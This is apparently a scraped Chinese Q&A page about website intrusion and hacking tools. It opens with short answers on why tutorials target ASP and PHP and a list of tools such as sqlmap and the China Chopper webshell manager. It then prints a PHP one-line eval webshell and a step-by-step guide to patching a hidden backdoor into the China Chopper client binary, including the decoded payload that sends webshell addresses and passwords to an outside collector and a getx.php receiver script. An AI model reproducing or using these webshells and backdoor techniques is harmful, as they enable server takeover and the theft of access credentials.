为什么网上的安全教程大部分基于ASP、PHP？

asp是曾经比较火热的web编程需要，大量的站点都在使用，于是也就让黑客有了针对性的方向，出现大量入侵asp网站的教程。而且本身在当面asp也是不完善的，存在许多的安全漏洞，在大量站点都使用的情况下，自然会出现许多安全教程。这是随着互联网发展而出现的趋势，因为大量使用，所以黑客学会了asp的入侵等就能获得更大价值，那么同样的为asp做安全修复也就成为了比较大量的需求。

cmaedu.comphp是后来变得热门起来的，现在大部分站点都是使用php，而它也正在经历和曾经的asp相似的历程，大量的黑客在研究它的漏洞，它的入侵方法，而且本身php开发者众多，代码出现漏洞是很常见的，所以大量的安全教程也就随之诞生了。

cmaedu.com其它语言没有asp，php那样广泛使用过，所以教程比较少很正常。

求个大牛，教下我什么是菜刀，如何入侵网站

cmaedu.com想入侵网站不是你一天两天就能学会的，首先要有很多的基础。没有人会一天变成黑客高手

黑客常用哪些工具

cmaedu.com使用工具的一直都是脚本工具，还有楼下说的那些已经过期了，什么鬼讲的。。。醉了。

cmaedu.com我怕中国红客的万鹰控制不住的想去找你谈论下什么叫黑客工具：

cmaedu.com常见的：啊D，明小子，sqlmap，3389，菜刀，webshell马儿，等等！

cmaedu.com

黑客菜刀是什么意思

cmaedu.com从软件名字上来讲有这个软件属于黑客工具，用于管理拿下的webshell批量管理。

cmaedu.com如果是菜刀的话可以在社工的时候拿菜刀威胁恐吓对方也属于忽悠的一种，也是属于黑客

cmaedu.com很高兴为逗逼解答。如果你满意的话麻烦采纳！

cmaedu.com

如何配置php才能让中国菜刀使用

在项目中新建一个PHP文件，里面写这样一段代码:?php eval($_POST['ee']); ?，再用中国菜刀去连接，密码：就是ee，可以随便改， 这里边更详细：

cmaedu.com

如何给中国菜刀添加隐蔽后门

cmaedu.com1、后门如何触发

cmaedu.com这里要先讲下菜刀的后门是如何触发的，知道如何触发后门，后面按这个思路往下看会方便些。

cmaedu.com当一句话连回目标服务器时，我们经常会在文件列表中右键查看文件，如下图

当我们执行右键-编辑文件时，我们的后门就会被触发（我们要添加的就是这样的一个隐藏后门）。

2、菜刀脱壳

在分析菜刀前，先把菜刀的壳脱掉，使用Peid可知，菜刀是UPx壳，网上找个Upx的脱壳工具即可脱壳。

cmaedu.com3、查看数据包，分析流程（右键-编辑）

本地搭建好环境后，在菜刀中右键-编辑查看某一文件，使用burpsuite进行抓包，

cmaedu.com数据如下

cmaedu.coma=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

一共有3个参数，

a url解码后为@eval (base64_decode($_POST[z0]));

z0先url解码，在base64解码为

cmaedu.com@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();

cmaedu.comZ1先url解码，在base64解码为

cmaedu.comC:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来，这段代码就是一个读文件的php脚本，由菜刀发送到目标服务器上，然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上，那我我们可以再字符串上添加我们想执行的代码，由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我们将上这段代码作为字符串，发送到服务端执行，我们就能获得webshell的地址和密码。

cmaedu.com4、使用OD分析

使用OD打开中国菜刀，右键搜索字符串，结果如下：

cmaedu.com定位到php读取文的字符串处，点击进去到代码处

cmaedu.com可知，程序时将其作为字符串，压入栈中作为参数被后续函数处理的，如果在这段字符串后加入我们的后门代码，就会被程序一块发送到服务端执行。

cmaedu.com5、修改菜刀程序文件

cmaedu.com由上可知，字符串的地址为0x49ba94,查看内存数据，

cmaedu.com发现其后面已经被他字符串占用（直接查看原二进制文件结果也是如此），如果我们强制在后面添加后门字符串，就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间，将后门代码放在此处。

这里我们选取地址4841d0h的空间，转化为文件偏移即为841d0h。

将后门字符串

$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

cmaedu.com放到文件841d0处

cmaedu.com打开010editor 将上述字符串复制到010editor中，

cmaedu.com由于程序中的字符串是双字节存放的，这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

cmaedu.com使用010editor打开菜刀程序，跳到841d0h偏移处，将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度，

cmaedu.com保存文件，这样后门字符串就被我们添加到程序中了。

cmaedu.com6、使用OD修改程序代码

cmaedu.com用OD打开菜刀程序，定位到第4步中字符串入栈的代码处 push 0049bae4。

0049bae4地址是修改前字符串的位置，现在我们将其改成我们添加的字符串的地质处，字符串文件偏移为841d0h，转化内存偏移为4841d0h,代码修改如下

cmaedu.com保存修改的文件即可。

7、测试修改结果

cmaedu.com修改文件后，我们在看看菜刀-右键编辑，抓到数据包

cmaedu.comZ0解密后为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();

可见我们的后门代码也一起被发送到服务端执行了。

编写加单的getx.php接收结果，

getx.php:

?php

cmaedu.com$getx = $_GET["caidao"];

cmaedu.com$file = fopen("getx.txt","a+");

fwrite($file,$getx);

cmaedu.comfwrite($file,"\r\n");

cmaedu.comfclose($file);

结果如下：

cmaedu.com8、后记

cmaedu.com通过测试可知，对于asp，aspx跟php后门的添加相似，都可以实现。Jsp木马形式不一，实现添加后门较为困难。另外，由于后门是在服务端执行的，所以不容易被发现，本地抓包是检测不到后门的；OD中右键查看后门地址也是不能直接看到的。